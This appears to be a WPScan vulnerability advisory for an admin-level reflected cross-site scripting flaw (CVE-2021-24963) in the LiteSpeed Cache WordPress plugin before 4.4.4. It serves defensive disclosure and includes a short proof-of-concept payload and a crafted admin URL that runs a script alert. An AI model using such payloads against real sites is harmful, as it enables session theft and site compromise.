WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

LiteSpeed Cache < 4.4.4 - Admin+ Reflected Cross-Site Scripting

Description

The plugin does not escape the qc_res parameter before outputting it back in the JS code of an admin page, leading to a Reflected Cross-Site Scripting

Proof of Concept

As admin, enter the following payload in the Domain Key setting of the plugin: </script><script>

Then open https://example.com/wp-admin/admin.php?page=litespeed-general&qc_res=</script><script>alert(/XSS/)</script>&domain_hash=541a0e1df04a2a5b7e4bd3472ff596cc

Affects Plugins

litespeed-cache
Fixed in version 4.4.4

References

CVE
CVE-2021-24963
URL
https://plugins.trac.wordpress.org/changeset/2634373

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

Emil Kylander

Submitter

Emil Kylander

Submitter website
https://emilkylander.se
Submitter twitter
emilkylander
Verified

Yes

WPVDB ID
7f8b4275-7586-4e04-afd9-d12bdab6ba9b

Timeline

Publicly Published

2021-11-30 (about 1 years ago)

Added

2021-11-30 (about 1 years ago)

Last Updated

2022-04-09 (about 11 months ago)

Our Other Services

WPScan WordPress Security Plugin